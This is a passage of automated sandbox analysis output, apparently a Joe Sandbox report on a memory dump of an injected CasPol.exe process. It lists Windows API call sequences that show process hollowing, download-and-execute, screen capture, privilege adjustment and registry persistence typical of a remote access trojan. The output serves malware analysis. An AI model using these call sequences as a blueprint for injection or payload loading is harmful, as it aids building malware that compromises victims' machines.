                                                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                            • String ID:
                                                                                                            • API String ID: 276877138-0
                                                                                                            • Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                            • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                            • Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                            • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                            APIs
                                                                                                              • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                              • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                              • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                              • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                              • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                            • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                            • String ID: PowrProf.dll$SetSuspendState
                                                                                                            • API String ID: 1589313981-1420736420
                                                                                                            • Opcode ID: 7adedae087191cdbb87074b96bc09b469b6d5cbd4a3edd008392af3fdf127515
                                                                                                            • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                            • Opcode Fuzzy Hash: 7adedae087191cdbb87074b96bc09b469b6d5cbd4a3edd008392af3fdf127515
                                                                                                            • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                                                                            • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID: ACP$OCP
                                                                                                            • API String ID: 2299586839-711371036
                                                                                                            • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                            • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                            • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                            • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                                            • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                            • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                            • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                            • String ID: SETTINGS
                                                                                                            • API String ID: 3473537107-594951305
                                                                                                            • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                            • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                            • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                            • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstH_prologNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 1157919129-0
                                                                                                            • Opcode ID: 6a2d412744edee45f0d860d0441e360fba5e5849462073823f699ecb6cc56ff2
                                                                                                            • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                            • Opcode Fuzzy Hash: 6a2d412744edee45f0d860d0441e360fba5e5849462073823f699ecb6cc56ff2
                                                                                                            • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                            APIs
                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                            • _free.LIBCMT ref: 00448067
                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 00448233
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                            • String ID:
                                                                                                            • API String ID: 1286116820-0
                                                                                                            • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                            • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                                                                            • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                            • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                                                                            APIs
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DownloadExecuteFileShell
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                            • API String ID: 2825088817-4197237851
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: FileFind$FirstNextsend
• String ID: x@G$x@G
• API String ID: 4113138495-3390264752
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
  • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
  • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
• _wcschr.LIBVCRUNTIME ref: 00450BF1
• _wcschr.LIBVCRUNTIME ref: 00450BFF
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 4212172061-0
APIs
• __EH_prolog.LIBCMT ref: 00408DAC
• FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
• FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: FileFind$FirstH_prologNext
• String ID:
• API String ID: 301083792-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
• TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
• ExitProcess.KERNEL32 ref: 0044258E
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: <D
• API String ID: 1084509184-3866323178
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: <D
• API String ID: 1084509184-3866323178
APIs
• GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
Similarity
• API ID: InfoLocale
• String ID: GetLocaleInfoEx
• API String ID: 2299586839-2904428671
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
Similarity
• API ID: ErrorLast$_free$InfoLocale_abort
• String ID:
• API String ID: 1663032902-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
Similarity
• API ID: ErrorLast$InfoLocale_abort_free
• String ID:
• API String ID: 2692324296-0
APIs
  • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
• EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
• CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
  • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
• CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
• DeleteDC.GDI32(?), ref: 0041805D
• DeleteDC.GDI32(00000000), ref: 00418060
• SelectObject.GDI32(00000000,00000000), ref: 0041806B
• StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
• GetIconInfo.USER32(?,?), ref: 004180CB
• DeleteObject.GDI32(?), ref: 004180FA
• DeleteObject.GDI32(?), ref: 00418107
• DrawIcon.USER32(00000000,?,?,?), ref: 00418114
• BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
• GetObjectA.GDI32(?,00000018,?), ref: 00418173
• LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
• LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
• GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
• DeleteDC.GDI32(?), ref: 0041827F
• DeleteDC.GDI32(00000000), ref: 00418282
• DeleteObject.GDI32(00000000), ref: 00418285
• GlobalFree.KERNEL32(00CC0020), ref: 00418290
• DeleteObject.GDI32(00000000), ref: 00418344
• GlobalFree.KERNEL32(?), ref: 0041834B
• DeleteDC.GDI32(?), ref: 0041835B
• DeleteDC.GDI32(00000000), ref: 00418366
• DeleteDC.GDI32(?), ref: 00418398
• DeleteDC.GDI32(00000000), ref: 0041839B
• DeleteObject.GDI32(?), ref: 004183A1
Similarity
• API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
• String ID: DISPLAY
• API String ID: 1765752176-865373369
APIs
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
• GetProcAddress.KERNEL32(00000000), ref: 0041728F
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
• GetProcAddress.KERNEL32(00000000), ref: 004172A3
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
• GetProcAddress.KERNEL32(00000000), ref: 004172B7
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
• GetProcAddress.KERNEL32(00000000), ref: 004172CB
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
• GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
• TerminateProcess.KERNEL32(?,00000000), ref: 00417454
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
• SetThreadContext.KERNEL32(?,00000000), ref: 00417575
• ResumeThread.KERNEL32(?), ref: 00417582
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
• GetCurrentProcess.KERNEL32(?), ref: 004175A5
• TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
• GetLastError.KERNEL32 ref: 004175C7
Similarity
• API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
• API String ID: 4188446516-3035715614
                                                                                                            • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                            • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                            • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                            • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                                            APIs
                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                            • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                            • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                            • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                              • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                              • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                              • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                            • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                            • API String ID: 4250697656-2665858469
                                                                                                            • Opcode ID: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                            • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                            • Opcode Fuzzy Hash: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                            • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                            APIs
                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
